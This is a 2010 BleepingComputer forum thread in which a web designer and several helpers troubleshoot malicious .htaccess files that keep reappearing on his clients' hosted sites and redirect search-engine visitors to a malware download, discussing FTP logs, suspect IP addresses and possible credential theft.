Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

.htaccess file appearing on my web server account


  • Please log in to reply
18 replies to this topic

#1 Gutsy

Gutsy

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New Jersey
  • Local time:11:59 PM

Posted 04 November 2010 - 07:10 PM

Hello,

I have a Windows XP machine and I posted my requet for help on Nutnworks about a week ago. I have AVG anti Virus version 9 and my virus and I routinely have it update and scan automatically. I sent you the zipped .htaccess file today.

I design web sites and one of my web site owners/clients indicated that when he searched for his site on Google and then clicked on the google link to his site, a pop-up appears to download a binary DOS file. This also happens when using other search engine sites (AOL, MSN, Alta Vista ...etc). Once you click off the pop-up ... it never appears again, and the link correctly goes to the web page listed.

My host checked my account and said there were over 300 malicious .htaccess files they had to remove off the server for all of my client web sites. They recommended that I have my PC scanned for viruses or malware because they suspected the program has all my passwords to FTP web pages. I changed all my server passwords online using another PC.

I worked with Tom K at Nutnworks for a couple of days with 6 software downloads to scan everything and my machine was clean last weekend, however the htaccess files have returned to the server even thouggh I changed "all" my passwords, I wrote to the host tech about this and asked him to look at the .htaccess file and he sent the following reply:

"This new .htaccess is indeed malicious - it is redirecting people to the same malware site as before.

It does look like only the .htaccess in .the "deco" account is infected. The only accounts on our server that are having this problem are the ones owned underneath your reseller account, so it continues to look like a piece of malware on the computer you are accessing from that is allowing this to happen."


So I wrote Tom K again about it. He asked me to send the file to Grinler (because I was having problems sending it to Little Eagle at Nutnworks .. getting a server error) for analysis and that's where I stand at this time.

After writing Grinler today I manually went into my 22 client accounts and removed about 60 or so .htaccess files (all the melicious files 4k large), however I did not remove those that I created to access certain secure directories. At this point all my client accounts are clean. Just not sure if I have "anything" on my machine that could cause the files to re-appear. Most of the .htaccess files were dated 10/20/10 ... h9owever they were all removed by my host just last Friday and I changed all my passwords right after they confirmed they werre deleted.

Tom gave me several links referring to the .htaccess files:

A link to a guy who has written a .PHP script to help with cleaning it off: http://alvinjiang.blogspot.com/2010/...to-remove.html

A lonk to a blog from a lady who had the issue:

Tom said if I do a google search on "exgocgkctswo", I would be able to find many other site designers that have been hit like myself- for example: This gal has posted the identical code http://forum.joomla.org/viewtopic.php?p=2260567 You may also notice that this .htaccess code will come up on the search engine for a variety of sites (nascar, real estate, etc..) which leads me to believe that their sites are currently infiltrated with this garbage.

If there's anything you can do to suggest how I can keep this from happening again other than changing my passwords periodically? Is there a program I can use to scan my sites to ensure everything is gone?

Thank you in advance!
Dave

Edited by Gutsy, 04 November 2010 - 07:11 PM.


BC AdBot (Login to Remove)

 


#2 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:04:59 AM

Posted 04 November 2010 - 07:16 PM

You need to make sure that your PHP Scripts are clean, and may I ask what software are you running on the site?

I had this same issue, and found that I had a vulnerable PHP Script, and since that day I have updated the software, and no more issues.

#3 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,665 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:59 PM

Posted 04 November 2010 - 10:31 PM

Are all of the sites who seem to be affected running joomla? My guess is that this is not a virus on the server, but rather a hack on the server.

Linux or Windows server?

#4 Gutsy

Gutsy
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New Jersey
  • Local time:11:59 PM

Posted 05 November 2010 - 10:58 AM

Thanks for getting back to me Criptodan and Grinler.

I do run a few PHP scripts on several sites and I'm hoping that they are clean. How would I know that they are clean?

I contacted the host this morning and told him that I removed all the problem .htaccess (4k) files manually yesterday, and this morning blank .htaccess (0k) files appeared now in the root directory. Not sure if this is a hack with 0k (nothing in the file) or not. He responded with the following:

Basically, the problem isn't so much that the .htaccess files are there at any given time, it is that they are re-appearing at will. They are being uploaded from the same IP address that you are accessing cPanel/ftp with which is a clear indication that your computer has some kind of infection. If the anti-malware solutions you are using are not detecting something, it does not mean that your computer is clean of malware - it simply means the companies behind the product have not identified the malware already and been able to come up with a signature and fix for it. My personal recommendation is to reinstall whenever a PC infection occurs, because you never know if your system has actually been cleaned.

Per the above ... is there malware out there that will identify the fingerprints of the .htaccess hack?

Thnaks in advance for any assistance you can offer! Appreciate it!

#5 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,665 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:59 PM

Posted 05 November 2010 - 11:32 AM

Can you pm me some of the logs. Request the logs showing what they are seeing.

I know of no malware that accesses ftp or cpanel and uploads htaccess files.

We need to know from the logs, if they are being created via cpanel or via ftp.

#6 Gutsy

Gutsy
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New Jersey
  • Local time:11:59 PM

Posted 15 November 2010 - 07:57 PM

Grinler,

Thanks for getting back to me .. sorry for the late reply. The .htaccess files showed up again on over a dozen oc my client accounts ... but with 0 bytes.

I asked my host for the logs for my accounts and herre is the addrress they provided showing all the htaccess fiules being uploaded and downloaded.

Search for .htaccess in htis FTP activity log:
https://ax56.genwebserver.com/dsereni.txt

My host said the foollowing in his reply to me:
You'll see the accounts are being hit from a few different locations, with the account password. Realistically there are two scenarios that could be causing this - one being that your home network is being compromised and the passwords are being stolen in transit (known as a man-in-the-middle attack) or that the passwords are being logged by a piece of malware on the computer and being transmitted to a command/control center to coordinate this. The second is the most likely.

Thanks again in advance for any advise you can offer.
Dave

#7 NpaMA

NpaMA

  • Members
  • 635 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Memphis, TN
  • Local time:12:59 AM

Posted 17 November 2010 - 02:04 AM

Would it be possible to disable the PHP scripts/installs to see if they reappear? From what I've seen it's normally exploited scripts on the server causing this. Although the "uploading from your IP" is a bit odd.

#8 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:04:59 AM

Posted 17 November 2010 - 06:10 AM

Do you allow anonymous FTP?

#9 Gutsy

Gutsy
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New Jersey
  • Local time:11:59 PM

Posted 18 November 2010 - 08:44 AM

Hello NpaMA and Bleepin,

Thank you both for your responses.

NpaMA .... I have 10 (out of 22) clients who I've installed PHP scripts that run slide shows, their email, and and online calendars using a database. Disabling them would be a real issue to them and a real headache/problem for me. I do however believe the scripts are fine. I will contact the vendor who I purchased many of the scrits from www.phpjabbers.com and see if they know of any security issues.

Bleepin ... I do not access the server using the anonymous FTP setting. Or are you referring to the server allowing it?

Thanks again!

#10 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:04:59 AM

Posted 18 November 2010 - 11:05 AM

Oct 20 02:42:22 ax56 pure-ftpd: (?@212.117.165.214) [INFO] action is now logged in

See the ? before the @ symbol?

To me that indicates anonymous FTP Log in.

Do you have the following accounts on your FTP:

action
aeconstr
borden
country
curriers

You see a pattern there?

It seems as though you have no password control on your FTP what so ever, or they are exploiting holes.

At this point and time, I would recommend switching hosts.

#11 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,665 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:59 PM

Posted 18 November 2010 - 03:35 PM

The ? symbol in front is just because its a login stage and the ftpd server does not know the user associated. Notice that once they login it changes to the loginname@ for each log entry.

These ip addresses. Do you recognize them or know who they belong to:

212.117.165.214
71.168.234.34
160.93.44.199

#12 Romeo29

Romeo29

    Learning To Bleep


  • Members
  • 3,194 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:127.0.0.1
  • Local time:11:59 PM

Posted 21 November 2010 - 07:17 PM

Some of the domains controlled by the OP are still infected (just checked before posting). If this goes on like this then I am afraid Google will blacklist them soon.

In my opinion, the download server (of malware) is changed every few days by uploading a new htaccess file or by redirecting from old server to new locations. The downloaded file is a packed EXE malware and many leading antivirus vendors like Symantec, McAfee, Kaspersky and Panda etc. were not able to detect it.

Here is the VirusTotal report: http://www.virustotal.com/file-scan/report.html?id=c4e634edbce2f42ed1a1edefbcf10c87d5e93c53a142aff9fab88e0ca3916846-1290383589

The OP should be telling all his/her customers (and their visitors) to scan their computers with updated anti-virus products.


Edited by Romeo29, 22 November 2010 - 11:32 AM.


#13 Gutsy

Gutsy
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New Jersey
  • Local time:11:59 PM

Posted 22 November 2010 - 11:02 AM

Hello Grinler & Romer29,

These two are mine:
71.168.234.34
160.93.44.199

IP: 212.117.165.214 is from overseas? Probably the culprit?

Romeo .... I just scanned a few of my sites on the virustotal.com site, including the one you scanned "SMUPA.COM" and they are showing that they are clean and no results for all the serarch engines listed.

I just searched a dozen of my cliient sites and the htaccess file is no longer re-appearing. I'm wondering if my hosting company found the cause and corrected the situation? I doubt they would admit it.

I'll keep you posted if anything appears or if I learn anything new.

Thank you again for your thoughts and advice on this issue.

Edited by Gutsy, 22 November 2010 - 11:02 AM.


#14 Romeo29

Romeo29

    Learning To Bleep


  • Members
  • 3,194 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:127.0.0.1
  • Local time:11:59 PM

Posted 22 November 2010 - 11:44 AM

Hello Gutsy,
I did not find the malware on the www.smupa.com site. But the site smupa.com redirected to another site, which redirected to another one and a malware file was downloaded. The malware file was named smupa.com.
It is good that htaccess is no longer there :)

#15 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,665 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:59 PM

Posted 22 November 2010 - 12:47 PM

This was definitely a case of either the site being hacked or the server being hacked.

Also these types of exploit kits wont attempt to infect/redirect you twice. Once a cookie is added it does not try again.

You may want to run a few virus scans on your computer to be safe as well as let your clients know the situation.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users